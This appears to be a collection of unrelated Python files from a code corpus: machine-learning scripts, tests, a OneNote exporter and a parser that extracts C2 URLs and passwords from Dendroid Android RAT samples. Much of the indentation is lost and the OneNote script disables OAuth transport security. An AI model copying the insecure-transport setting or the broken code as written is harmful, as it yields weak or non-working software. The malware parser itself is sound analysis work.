}
*(grad_c1_init + col) = cur_c1;
*(grad_c2_init + col) = cur_c2;
*(grad_eps + col%dim) = geps;
}
}
"""
|
16117
|
from data_reader.reader import CsvReader
from util import *
import numpy as np
import matplotlib.pyplot as plt
class LogisticRegression(object):
def __init__(self, learning_rate=0.01, epochs=50):
self.__epochs= epochs
self.__learning_rate = learning_rate
def fit(self, X, y):
self.w_ = np.zeros(1 + X.shape[1])
self.cost_ = []
for i in range(self.__epochs):
# 1- Calculate the net input W^T * x
z = self.__net_input(X)
# 2- Get the activation using Sigmoid function
h = self.__activation(z)
            # 3- Calculate the error and the gradient
            errors = y - h
            gradient = X.T.dot(errors)
            # 4- Update the weights and bias using the gradient and learning rate
            # (the bias gradient is the sum of the errors, not of the per-feature gradients)
            self.w_[1:] += self.__learning_rate * gradient
            self.w_[0] += self.__learning_rate * errors.sum()
            # 5- Collect the cost for this epoch
            self.cost_.append(self.__logit_cost(y, h))
def __logit_cost(self, y, y_val):
logit = -y.dot(np.log(y_val)) - ((1 - y).dot(np.log(1 - y_val)))
return logit
def __sigmoid(self, z):
return 1.0 / (1.0 + np.exp(-z))
def __net_input(self, X):
return np.dot(X, self.w_[1:]) + self.w_[0]
def __activation(self, X):
return self.__sigmoid(X)
    def predict(self, X):
        # 1- Calculate the net input W^T * x
        z = self.__net_input(X)
        # 2- Threshold the activation into 0/1 class labels
        h = self.__activation(z)
        return np.where(h >= 0.5, 1, 0)
reader = CsvReader("./data/Iris.csv")
iris_features, iris_labels = reader.get_iris_data()
ignore_virginica = [i for i, v in enumerate(iris_labels) if v == 'Iris-virginica']
iris_features = [v for i, v in enumerate(iris_features) if i not in ignore_virginica]
iris_labels = [v for i, v in enumerate(iris_labels) if i not in ignore_virginica]
print(len(iris_features))
print(len(iris_labels))
iris_features, iris_labels = shuffle(iris_features, iris_labels)
iris_labels = to_onehot(iris_labels)
iris_labels = list(map(lambda v: v.index(max(v)), iris_labels))
train_x, train_y, test_x, test_y = iris_features[0:89], iris_labels[0:89], iris_features[89:], iris_labels[89:]
train_x, train_y, test_x, test_y = np.asarray(train_x), np.asarray(train_y), np.asarray(test_x), np.asarray(test_y)
train_x, means, stds = standardize(train_x)
test_x = standardize(test_x, means, stds)
lr = LogisticRegression(learning_rate=0.1, epochs=50)
lr.fit(train_x, train_y)
plt.plot(range(1, len(lr.cost_) + 1), np.log10(lr.cost_))
plt.xlabel('Epochs')
plt.ylabel('Cost')
plt.title('Logistic Regression - Learning rate 0.1')
plt.tight_layout()
plt.show()
predicted_test = lr.predict(test_x)
print("Test Accuracy: " + str(((sum([predicted_test[i] == test_y[i] for i in range(0, len(predicted_test))]) / len(predicted_test)) * 100.0)) + "%")
|
16148
|
import hashlib
import hmac

# Compute an HMAC-MD5 over a file, reading it in 1 KiB blocks.
hmac_md5 = hmac.new(b'secret-key', digestmod=hashlib.md5)
with open('sample-file.txt', 'rb') as f:
    while True:
        block = f.read(1024)
        if not block:
            break
        hmac_md5.update(block)
digest = hmac_md5.hexdigest()
print(digest)
|
16159
|
import logging
import time
import numpy as np
from eda import ma_data, tx_data
from sir_fitting_us import seir_experiment, make_csv_from_tx_traj
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.info("Fitting model.")
# initial values taken from previous fit, used to seed MH sampler efficiently.
x0 = np.array([ 0.393, -2.586, -3.241, -5.874, -24.999])
# ma_traj = seir_experiment(ma_data, x0, iterations=10000)
tx_traj = seir_experiment(tx_data, x0, iterations=10000)
# mean_ll = np.mean([ll for (x, ll) in ma_traj])
mean_ll = np.mean([ll for (x, ll) in tx_traj])
logger.info("Model fitting finished with mean log-likelihood: {}".format(mean_ll))
if mean_ll < -2000:
raise AssertionError(
"""Mean log-likelihood {} less than threshold of
-20. This is probably an error.""".format(mean_ll)
)
underscored_time = time.ctime().replace(" ", "_")
fname = "ma_seir_output_{}.csv".format(underscored_time)
make_csv_from_tx_traj(tx_traj, tx_data, fname)
|
16166
|
import mod
def foo():
return 1
try:
mod.foo = foo
except RuntimeError:
print("RuntimeError1")
print(mod.foo())
try:
mod.foo = 1
except RuntimeError:
print("RuntimeError2")
print(mod.foo)
try:
mod.foo = 2
except RuntimeError:
print("RuntimeError3")
print(mod.foo)
def __main__():
pass
|
16176
|
import argparse
import logging
import os
import pathlib
import time
import log
import onenote_auth
import onenote
import pipeline
logger = logging.getLogger()
def main():
args = parse_args()
if args.verbose:
log.setup_logging(logging.DEBUG)
else:
log.setup_logging(logging.INFO)
# Allow a redirect URI over plain HTTP (no TLS):
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = "1"
# Authorize the app:
s = onenote_auth.get_session(args.new_session)
output_dir = pathlib.Path(args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
logger.info('Writing to "%s"', output_dir)
start_time = time.perf_counter()
pipe = pipeline.Pipeline(s, args.notebook, output_dir)
pages = 0
try:
for page_count, page in enumerate(
onenote.get_notebook_pages(s, args.notebook), 1
):
log_msg = f'Page {page_count}: {page["title"]}'
if args.start_page is None or page_count >= args.start_page:
logger.info(log_msg)
pipe.add_page(page)
pages += 1
else:
logger.info(log_msg + ' [skipped]')
            if args.max_pages and page_count >= args.max_pages:
break
except onenote.NotebookNotFound as e:
logger.error(str(e))
pipe.done()
stop_time = time.perf_counter()
logger.info('Done!')
logger.info('%s pages in %.1f seconds', pages, stop_time - start_time)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('notebook', help='display name of notebook to dump')
parser.add_argument('output_dir', help='directory to which to output')
parser.add_argument(
'-m', '--max-pages', type=int, help='max pages to dump'
)
parser.add_argument(
'-s', '--start-page', type=int, help='start page number to dump'
)
parser.add_argument(
'-n',
'--new-session',
action="store_true",
help='ignore saved auth token',
)
parser.add_argument(
'-v', '--verbose', action="store_true", help='show verbose output'
)
return parser.parse_args()
if __name__ == '__main__':
    main()
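
# Example invocation (hypothetical script name; the arguments map onto parse_args above):
#
#   python dump_onenote.py "Work Notes" ./notebook_dump --verbose --max-pages 50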
|
16204
|
from common import Modules, data_strings, load_yara_rules, AndroidParseModule, ModuleMetadata
from base64 import b64decode
from string import printable
class dendroid(AndroidParseModule):
def __init__(self):
md = ModuleMetadata(
module_name="dendroid",
bot_name="Dendroid",
description="Android RAT",
authors=["<NAME> (@botnet_hunter)"],
version="1.0.0",
date="August 18, 2014",
references=[]
)
AndroidParseModule.__init__(self, md)
self.yara_rules = None
pass
def _generate_yara_rules(self):
if self.yara_rules is None:
self.yara_rules = load_yara_rules("dendroid.yara")
return self.yara_rules
def get_bot_information(self, file_data):
results = {}
uri = None
password = None
        for s in data_strings(file_data, charset="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="):
try:
line = b64decode(s)
if len(line) == 0:
continue
valid = True
for c in line:
if c not in printable:
valid = False
if not valid:
continue
if line.lower().startswith("https://") or line.lower().startswith("http://"):
uri = line
continue
if uri is not None:
password = line
break
except TypeError:
continue
if uri is not None:
results["c2_uri"] = uri
if password is not None:
try:
password.decode("utf8")
results["password"] = password
except UnicodeDecodeError:
results["password"] = "h" + password.encode("hex")
return results
Modules.list.append(dendroid())
|
16233
|
import pytest
import rasterio as rio
from rasterio.io import DatasetWriter
from cog_worker import Manager
from rasterio import MemoryFile, crs
TEST_COG = "tests/roads_cog.tif"
@pytest.fixture
def molleweide_manager():
return Manager(
proj="+proj=moll",
scale=50000,
)
@pytest.fixture
def sample_function():
def myfunc(worker):
return worker.read(TEST_COG)
return myfunc
def test_preview(molleweide_manager, sample_function):
arr, bbox = molleweide_manager.preview(sample_function, max_size=123)
assert max(arr.shape) == 123, "Expected maximum array dimension to be 123px"
def test_tile(molleweide_manager, sample_function):
arr, bbox = molleweide_manager.tile(sample_function, x=1, y=2, z=3)
assert arr.shape == (1, 256, 256), "Expected 256x256 tile"
def test_chunk_execute(molleweide_manager, sample_function):
chunks = list(molleweide_manager.chunk_execute(sample_function, chunksize=123))
for arr, bbox in chunks:
assert max(arr.shape) <= 123, "Max chunk size should be 123px"
def test_chunk_params(molleweide_manager):
chunks = list(molleweide_manager.chunk_params(chunksize=123))
assert len(chunks) == 18, "Expected ~18 chunks for 123px tiles at 50km scale"
def test__open_writer(molleweide_manager):
with MemoryFile() as memfile:
with molleweide_manager._open_writer(memfile, 1, rio.ubyte) as writer:
assert isinstance(writer, DatasetWriter)
def test_chunk_save(molleweide_manager, sample_function):
full_arr = molleweide_manager.execute(sample_function)[0]
with MemoryFile() as memfile:
molleweide_manager.chunk_save(memfile, sample_function)
memfile.seek(0)
with rio.open(memfile) as src:
assert src.profile["crs"] == crs.CRS.from_string("+proj=moll")
assert src.profile["transform"][0] == 50000
arr = src.read()
assert arr.shape == full_arr.shape
assert (
abs(arr.sum() / full_arr.data.sum() - 1) < 0.002
), "Error should be less than 0.2%"
def test__write_chunk(molleweide_manager, sample_function):
with MemoryFile() as memfile:
arr, bbox = molleweide_manager.execute(sample_function)
print(arr.mask.sum())
with molleweide_manager._open_writer(memfile, 1, rio.ubyte) as writer:
molleweide_manager._write_chunk(writer, arr, bbox)
memfile.seek(0)
with rio.open(memfile) as src:
written = src.read(masked=True)
assert (written == arr).all()
assert (written.mask == arr.mask).all()
def test__chunk_bounds(molleweide_manager):
chunk = molleweide_manager._chunk_bounds(0, 0, 123)
assert chunk == (
-18040095.696147293,
2674978.852256801,
-11890095.696147293,
8824978.852256801,
)
def test__num_chunks(molleweide_manager):
assert molleweide_manager._num_chunks(123) == (6, 3)
|
16310
|
from django.test import TestCase
from django_hosts import reverse
from util.test_utils import Get, assert_requesting_paths_succeeds
class UrlTests(TestCase):
def test_all_get_request_paths_succeed(self):
path_predicates = [
Get(reverse('skills_present_list'), public=True),
Get(reverse('profile'), public=False),
Get(reverse('suggest'), public=False),
]
assert_requesting_paths_succeeds(self, path_predicates)
|
16321
|
from PyQt5.QtCore import *
class ConstrainedOpt(QThread):
signal_update_voxels = pyqtSignal(str)
def __init__(self, model,index):
QThread.__init__(self)
self.model = model['model']
# self.model = model
self.name = model['name']
self.index = index
def run(self):
# while True:
self.update_voxel_model()
def update_voxel_model(self):
self.signal_update_voxels.emit('update_voxels')
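
# Usage sketch (illustrative; `model_dict` and `on_update` are placeholders supplied by
# the surrounding application):
#
#   worker = ConstrainedOpt(model_dict, index=0)   # expects {'model': ..., 'name': ...}
#   worker.signal_update_voxels.connect(on_update)
#   worker.start()                                 # QThread.start() runs run() in a background thread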
|
16340
|
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class DistributedPlantBaseAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPlantBaseAI')
|
16345
|
from Redy.Opt import feature, constexpr
import timeit
class Closure(tuple):
def __call__(self, a):
c, f = self
return f(c, a)
def f1(x):
def g(y):
return x + y
return g
def fc(c, y):
return c + y
@feature(constexpr)
def f2(x):
return constexpr[Closure]((x, constexpr[fc]))
print(f1(1)(2))
print(f2(1)(2))
# 3
# 3
# mk closure
print(timeit.timeit("f(1)", globals=dict(f=f1)))
print(timeit.timeit("f(1)", globals=dict(f=f2)))
# 0.15244655999958923
# 0.16590227899905585
f1_ = f1(2)
f2_ = f2(2)
print(timeit.timeit("f(1)", globals=dict(f=f1_)))
print(timeit.timeit("f(1)", globals=dict(f=f2_)))
# 0.08070355000018026
# 0.20936105600048904
# So, use builtin closures instead of making our own
|
16384
|
import picamera
from time import sleep
IMG_WIDTH = 800
IMG_HEIGHT = 600
IMAGE_DIR = "/home/pi/Desktop/"
IMG = "snap.jpg"
def vid():
camera = picamera.PiCamera()
camera.vflip = True
camera.hflip = True
camera.brightness = 60
#camera.resolution = (IMG_WIDTH, IMG_HEIGHT)
camera.start_preview()
camera.annotate_text = "Doorbell pressed!"
camera.annotate_text_size = 50
#display video for 5 seconds
sleep(5)
camera.stop_preview()
camera.close()
# https://www.raspberrypi.org/learning/tweeting-babbage/worksheet/
######################################################
# picamera default values:
######################################################
# camera.sharpness = 0
# camera.contrast = 0
# camera.brightness = 50
# camera.saturation = 0
# camera.ISO = 0
# camera.video_stabilization = False
# camera.exposure_compensation = 0
# camera.exposure_mode = 'auto'
# camera.meter_mode = 'average'
# camera.awb_mode = 'auto'
# camera.image_effect = 'none'
# camera.color_effects = None
# camera.rotation = 180
# camera.hflip = False
# camera.vflip = False
# camera.crop = (0.0, 0.0, 1.0, 1.0)
######################################################
# video will record 5 seconds
######################################################
# camera.start_recording('video.h264')
# sleep(5)
# camera.stop_recording()
######################################################
# add text to video:
######################################################
#camera.start_preview()
#camera.annotate_text = "Doorbell pressed!"
#camera.annotate_text_size = 50
#sleep(5)
#camera.capture('/home/pi/Desktop/text.jpg')
#camera.stop_preview()
######################################################
# loop over camera effects:
######################################################
#camera = picamera.PiCamera()
#camera.vflip = True
#camera.hflip = True
#camera.start_preview()
#for effect in camera.IMAGE_EFFECTS:
# camera.image_effect = effect
# camera.annotate_text = "Effect: %s" % effect
# sleep(1)
#camera.stop_preview()
|
16448
|
import click
from kryptos.scripts import build_strategy, stress_worker, kill_strat
@click.group(name="strat")
def cli():
pass
cli.add_command(build_strategy.run, "build")
cli.add_command(stress_worker.run, "stress")
cli.add_command(kill_strat.run, "kill")
|
16485
|
import numpy as np
import unittest
import coremltools.models.datatypes as datatypes
from coremltools.models import neural_network as neural_network
from coremltools.models import MLModel
from coremltools.models.neural_network.printer import print_network_spec
from coremltools.converters.nnssa.coreml.graph_pass.mlmodel_passes import \
remove_disconnected_layers, transform_conv_crop, remove_redundant_transposes
import copy
import pytest
DEBUG = False
np.random.seed(100)
class MLModelPassesTest(unittest.TestCase):
def test_load_constant_remove(self):
input_features = [('data', datatypes.Array(*(3, 4)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
builder.add_activation('relu1', 'RELU', 'data', 'relu1')
builder.add_load_constant_nd('const1', 'c1', constant_value=np.ones((5,)), shape=(5,))
builder.add_activation('relu2', 'RELU', 'relu1', 'out')
builder.add_load_constant_nd('const2', 'c2', constant_value=np.ones((5,)), shape=(5,))
builder.add_load_constant_nd('const3', 'c3', constant_value=np.ones((5,)), shape=(5,))
spec = builder.spec
np.testing.assert_equal(5, len(spec.neuralNetwork.layers))
remove_disconnected_layers(spec)
np.testing.assert_equal(2, len(spec.neuralNetwork.layers))
def test_dead_layer_remove(self):
input_features = [('data', datatypes.Array(*(3, 4)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
builder.add_activation('relu1', 'RELU', 'data', 'relu1')
builder.add_load_constant_nd('const1', 'c1', constant_value=np.ones((5,)), shape=(5,))
builder.add_load_constant_nd('const2', 'c2', constant_value=np.ones((5,)), shape=(5,))
builder.add_split_nd('splitnd1', 'const2', ['s1', 's2', 's3'], axis=0, num_splits=3)
builder.add_squeeze('squeeze', 's1', 'squeeze_out')
builder.add_activation('relu4', 'RELU', 's2', 'relu4')
builder.add_activation('relu5', 'RELU', 'relu4', 'relu5')
builder.add_load_constant_nd('const3', 'c3', constant_value=np.ones((5,)), shape=(5,))
builder.add_activation('relu2', 'RELU', 'relu1', 'out')
spec = builder.spec
np.testing.assert_equal(9, len(spec.neuralNetwork.layers))
remove_disconnected_layers(spec)
np.testing.assert_equal(2, len(spec.neuralNetwork.layers))
@pytest.mark.xfail
def test_dead_layer_remove_branch(self):
convergence_tolerance = 1e-8
input_features = [('input', datatypes.Array(*(2,)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
# add condition to break from the loop, if convergence criterion is met
builder.add_less_than('cond', ['input'], 'cond', alpha=convergence_tolerance)
branch_layer = builder.add_branch('branch_layer', 'cond')
builder_ifbranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.ifBranch)
builder_ifbranch.add_activation('relu1', 'RELU', 'input', 'relu1_out')
builder_ifbranch.add_activation('relu2_out', 'RELU', 'relu1_out', 'relu2_out')
builder_elsebranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.elseBranch)
builder_elsebranch.add_activation('linear1', 'LINEAR', 'input', 'linear1_out')
builder_elsebranch.add_activation('linear2', 'LINEAR', 'linear1_out', 'relu2_out')
builder.add_squeeze('out', 'input', 'out', squeeze_all=True)
mlmodel = MLModel(builder.spec)
data = np.random.rand(2,)
data_dict = {'input': data}
before_pass_out = mlmodel.predict(data_dict)['out']
if DEBUG:
print('\n mlmodel description before remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
remove_disconnected_layers(builder.spec)
if DEBUG:
print('\n mlmodel description after remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
mlmodel = MLModel(builder.spec)
after_pass_out = mlmodel.predict(data_dict)['out']
np.testing.assert_almost_equal(before_pass_out, after_pass_out, decimal=2)
np.testing.assert_equal(len(builder.spec.neuralNetwork.layers), 1)
@pytest.mark.xfail
def test_dead_layer_partial_branch(self):
convergence_tolerance = 1e-8
input_features = [('input', datatypes.Array(*(2,)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
# add condition to break from the loop, if convergence criterion is met
builder.add_less_than('cond', ['input'], 'cond', alpha=convergence_tolerance)
branch_layer = builder.add_branch('branch_layer', 'cond')
builder_ifbranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.ifBranch)
builder_ifbranch.add_activation('relu1', 'RELU', 'input', 'relu1_out')
builder_ifbranch.add_activation('relu2_out', 'RELU', 'relu1_out', 'relu2_out')
builder_elsebranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.elseBranch)
builder_elsebranch.add_activation('linear1', 'LINEAR', 'input', 'linear1_out')
builder_elsebranch.add_activation('linear_red_1', 'LINEAR', 'input', 'linear_red1_out')
builder_elsebranch.add_activation('linear_red_2', 'LINEAR', 'linear_red1_out', 'linear_red2_out')
builder_elsebranch.add_activation('linear2', 'LINEAR', 'linear1_out', 'relu2_out')
builder.add_squeeze('out', 'relu2_out', 'out', squeeze_all=True)
mlmodel = MLModel(builder.spec)
data = np.random.rand(2,)
data_dict = {'input': data}
before_pass_out = mlmodel.predict(data_dict)['out']
if DEBUG:
print('\n mlmodel description before remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
old_spec = copy.copy(builder.spec)
remove_disconnected_layers(builder.spec)
if DEBUG:
print('\n mlmodel description after remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
mlmodel = MLModel(builder.spec)
after_pass_out = mlmodel.predict(data_dict)['out']
np.testing.assert_almost_equal(before_pass_out, after_pass_out, decimal=2)
np.testing.assert_equal(len(old_spec.neuralNetwork.layers[1].branch.ifBranch.layers),
len(builder.spec.neuralNetwork.layers[1].branch.ifBranch.layers))
np.testing.assert_equal(len(builder.spec.neuralNetwork.layers[1].branch.elseBranch.layers), 2)
def test_conv_crop_bn_to_conv_bn_crop(self):
input_features = [('data', datatypes.Array(1, 10, 10))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features)
W = np.ones((2,10,1,10), dtype=np.float32)
builder.add_convolution(name='conv',
kernel_channels=1,
output_channels=2,
height=2, width=2,
stride_height=1, stride_width=1,
border_mode='valid', groups=1,
W=W,
b=None, has_bias=False,
input_name='data', output_name='conv_out')
builder.add_crop(name='crop',
left=1, right=1, top=1, bottom=1, offset=0,
input_names=['conv_out'],
output_name='crop_out')
builder.add_batchnorm(name='bn',
channels=2,
gamma=np.ones(2,).astype(np.float32),
beta=np.ones(2,).astype(np.float32),
mean=np.ones(2,).astype(np.float32),
variance=np.ones(2,).astype(np.float32),
input_name='crop_out',
output_name='out')
# Conv -> Crop -> BN
spec = builder.spec.neuralNetwork
np.testing.assert_equal('crop', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('batchnorm', spec.layers[2].WhichOneof('layer'))
# transform the pattern
transform_conv_crop(builder.spec)
# Conv -> BN -> Crop
np.testing.assert_equal('batchnorm', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('crop', spec.layers[2].WhichOneof('layer'))
def test_conv_crop_bn_relu_to_conv_bn_relu_crop(self):
input_features = [('data', datatypes.Array(1, 10, 10))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features)
W = np.ones((2,10,1,10), dtype=np.float32)
builder.add_convolution(name='conv',
kernel_channels=1,
output_channels=2,
height=2, width=2,
stride_height=1, stride_width=1,
border_mode='valid', groups=1,
W=W,
b=None, has_bias=False,
input_name='data', output_name='conv_out')
builder.add_crop(name='crop',
left=1, right=1, top=1, bottom=1, offset=0,
input_names=['conv_out'],
output_name='crop_out')
builder.add_batchnorm(name='bn',
channels=2,
gamma=np.ones(2,).astype(np.float32),
beta=np.ones(2,).astype(np.float32),
mean=np.ones(2,).astype(np.float32),
variance=np.ones(2,).astype(np.float32),
input_name='crop_out',
output_name='bn_out')
builder.add_activation(name='relu',
non_linearity='RELU',
input_name='bn_out',
output_name='out')
# Conv -> Crop -> BN -> ReLU
spec = builder.spec.neuralNetwork
np.testing.assert_equal('crop', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('batchnorm', spec.layers[2].WhichOneof('layer'))
np.testing.assert_equal('activation', spec.layers[3].WhichOneof('layer'))
# transform the pattern
transform_conv_crop(builder.spec)
# Conv -> BN -> ReLU -> Crop
np.testing.assert_equal('batchnorm', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('activation', spec.layers[2].WhichOneof('layer'))
np.testing.assert_equal('crop', spec.layers[3].WhichOneof('layer'))
def test_redundant_transposes(self):
def _build_and_test_network(input_size, transpose_layers, expected_layers):
"""
Helper function for testing transpose removal.
Args:
                input_size: Shape of the network's input tensor.
transpose_layers: Array of transpose axes definitions.
expected_layers: Array of indices into transpose_layers indicating
which of the transpose layers should be present after the
graph pass.
"""
input_features = [('data', datatypes.Array(*input_size))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features)
last_layer = 'data'
for idx, axes in enumerate(transpose_layers):
name = 't{}'.format(idx)
if idx == len(transpose_layers) - 1:
output_name = 'out'
else:
output_name = name + '_out'
builder.add_transpose(name=name,
axes=axes,
input_name=last_layer,
output_name=output_name)
last_layer = output_name
spec = builder.spec.neuralNetwork
# Check the network before the graph pass.
for idx in range(len(transpose_layers)):
np.testing.assert_equal('transpose', spec.layers[idx].WhichOneof('layer'))
# Run the removal pass.
remove_redundant_transposes(builder.spec)
# Verify only the expected layers remain.
np.testing.assert_equal(len(spec.layers), len(expected_layers))
for output_layer_idx, input_layer_idx in enumerate(expected_layers):
np.testing.assert_equal(
'transpose',
spec.layers[output_layer_idx].WhichOneof('layer')
)
np.testing.assert_array_equal(
transpose_layers[input_layer_idx],
spec.layers[output_layer_idx].transpose.axes
)
_build_and_test_network(
input_size=[1, 10, 10],
# These transposes together are the identity.
transpose_layers=[[2, 0, 1], [1, 2, 0]],
expected_layers=[],
)
_build_and_test_network(
input_size=[1, 10, 10],
# These transposes are not inverses.
transpose_layers=[[2, 0, 1], [2, 0, 1]],
expected_layers=[0, 1],
)
_build_and_test_network(
input_size=[1, 1, 10, 10, 3],
# First two are the identity, then an extra.
transpose_layers=[[2, 4, 1, 0, 3], [3, 2, 0, 4, 1], [1, 0, 2, 3, 4]],
expected_layers=[2],
)
_build_and_test_network(
input_size=[1, 1, 10, 10, 3],
# First is okay, next two are the identity.
transpose_layers=[[1, 0, 2, 3, 4], [2, 4, 1, 0, 3], [3, 2, 0, 4, 1]],
expected_layers=[0],
)
        # A slightly more complicated case: two transposes that appear
        # consecutively in topological order but actually sit on parallel
        # branches of the graph.
builder = neural_network.NeuralNetworkBuilder(
[('data', datatypes.Array(2, 4, 8))],
[('out', None)]
)
last_layer = 'data'
builder.add_transpose(name='t1',
axes=[0, 2, 1],
input_name='data',
output_name='t1')
builder.add_transpose(name='t2',
axes=[0, 2, 1],
input_name='data',
output_name='t2')
builder.add_stack(name='stack',
input_names=['t1', 't2'],
output_name='out')
spec = builder.spec.neuralNetwork
# Run the removal pass.
remove_redundant_transposes(builder.spec)
# Verify nothing was removed.
np.testing.assert_equal(len(spec.layers), 3)
if __name__ == '__main__':
RUN_ALL_TESTS = True
if RUN_ALL_TESTS:
unittest.main()
else:
suite = unittest.TestSuite()
suite.addTest(MLModelPassesTest('test_load_constant_remove'))
unittest.TextTestRunner().run(suite)
|
16496
|
import json
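# Build the dataset_info descriptor for the W1BS baseline stereo benchmark:
# each sequence lists its image pairs (stored under <seq>/1 and <seq>/2) plus a
# link file per pair under <seq>/h, and the result is written to
# ./datasets/dataset_info/W1BS.json.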
sequence_name_list = ['A','G','L','map2photo','S']
description_list = ['Viewpoint Appearance','Viewpoint','ViewPoint Lighting','Map to Photo','Modality']
label_list = [
['arch', 'obama', 'vprice0', 'vprice1', 'vprice2', 'yosemite'],
['adam', 'boat','ExtremeZoomA','face','fox','graf','mag','shop','there','vin'],
['amos1','bdom','brugge_square', 'GC2','light','madrid',\
'notredame15','paintedladies','rushmore','trevi','vatican'],
['map1', 'map2', 'map3', 'map4', 'map5', 'map6'],
['angiogram','brain1','EO-IR-2',\
'maunaloa','mms68','mms75','treebranch']
]
#label_list = [
# ['arch', 'obama', 'vprice0', 'vprice1', 'vprice2', 'yosemite']
# ]
json_data = {}
json_data['Dataset Name'] = 'W1BS'
json_data['Description'] = 'Baseline Stereo Benchmark'
json_data['url'] = 'http://cmp.felk.cvut.cz/wbs/datasets/W1BS_with_patches.tar.gz'
json_data['Sequence Number'] = len(sequence_name_list)
json_data['Sequence Name List'] = sequence_name_list
json_data['Sequences'] = []
for idx, sequence_name in enumerate(sequence_name_list):
sequence = {}
sequence['Name'] = sequence_name
sequence['Description'] = sequence_name
sequence['Label'] = description_list[idx]
sequence['Images'] = []
sequence['Image Number'] = len(label_list[idx])*2
sequence['Link Number'] = len(label_list[idx])
sequence['Links'] = []
for image_idx, image_label in enumerate(label_list[idx]):
image = {}
image['file'] = '{}/1/{}.bmp'.format(sequence_name,image_label)
image['id'] = str(image_label) + '_1'
image['label'] = str(image_label) + '_1'
sequence['Images'].append(image)
image = {}
image['file'] = '{}/2/{}.bmp'.format(sequence_name,image_label)
image['id'] = str(image_label) + '_2'
image['label'] = str(image_label) + '_2'
sequence['Images'].append(image)
link = {}
link['source'] = str(image_label) + '_1'
link['target'] = str(image_label) + '_2'
link['file'] = '{}/h/{}.txt'.format(sequence_name, image_label)
sequence['Links'].append(link)
json_data['Sequences'].append(sequence)
with open('./datasets/dataset_info/{}.json'.format('W1BS'),'w') as json_file:
json.dump(json_data, json_file, indent=2)
|
16534
|
from opt_utils import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip_compilation", action='store_true', help="skip compilation")
args = parser.parse_args()
if not args.skip_compilation:
compile_all_opt_examples()
for example in all_examples:
args = []
output = run_example(example, args, True).decode('ascii')
with open(example + ".log", "w") as text_file:
text_file.write(output)
|
16539
|
import unittest
from unittest.mock import Mock
import mock
import peerfinder.peerfinder as peerfinder
import requests
from ipaddress import IPv6Address, IPv4Address
class testPeerFinder(unittest.TestCase):
def setUp(self):
self.netixlan_set = {
"id": 1,
"ix_id": 2,
"name": "Test IX",
"ixlan_id": 3,
"notes": "",
"speed": 1000,
"asn": 65536,
"ipaddr4": ["192.0.2.1"],
"ipaddr6": ["0100::"],
"is_rs_peer": True,
"operational": True,
"created": "2010-01-01T00:00:00Z",
"updated": "2010-01-01T00:00:00Z",
"status": "ok",
}
self.netfac_set = {
"id": 1,
"name": "Test Facility",
"city": "Dublin",
"country": "IE",
"fac_id": 1,
"local_asn": 65536,
"created": "2010-01-01T00:00:00Z",
"updated": "2010-01-01T00:00:00Z",
"status": "ok",
}
self.peer = {"name": "<NAME>", "asn": 65536}
def test_pdb_to_ixp(self):
expected = peerfinder.IXP(
name="Test IX",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
self.assertEqual(expected, peerfinder.pdb_to_ixp(self.netixlan_set))
def test_pdb_to_peer(self):
ixp = peerfinder.pdb_to_ixp(self.netixlan_set)
fac = peerfinder.pdb_to_fac(self.netfac_set)
expected = peerfinder.Peer(
name="<NAME>", ASN=65536, peering_on=ixp, present_in=fac,
)
self.assertEqual(expected, peerfinder.pdb_to_peer(self.peer, ixp, fac))
def test_pdb_to_fac(self):
expected = peerfinder.Facility(name="Test Facility", ASN=65536)
self.assertEqual(expected, peerfinder.pdb_to_fac(self.netfac_set))
def test__dedup_ixs(self):
expected = {
"Test IX": {
"ipaddr4": [["192.0.2.1"], ["192.0.2.1"]],
"ipaddr6": [["0100::"], ["0100::"]],
"name": "Test IX",
"speed": 2000,
}
}
self.assertEqual(
expected, peerfinder._dedup_ixs([self.netixlan_set, self.netixlan_set]),
)
def test_fetch_ix_from_ixps(self):
expected = peerfinder.pdb_to_ixp(self.netixlan_set)
ixp = [peerfinder.pdb_to_ixp(self.netixlan_set)]
self.assertEqual(expected, peerfinder.fetch_ix_from_ixps("Test IX", ixp))
def test_fetch_fac_from_facilities(self):
expected = peerfinder.pdb_to_fac(self.netfac_set)
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
        self.assertEqual(expected, peerfinder.fetch_fac_from_facilities("Test Facility", fac))
def test_fetch_common_ixps(self):
ixp = [peerfinder.pdb_to_ixp(self.netixlan_set)]
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
peer = [peerfinder.pdb_to_peer(self.peer, ixp, fac)]
expected = {"Test IX"}
self.assertEqual(expected, peerfinder.fetch_common_ixps(peer))
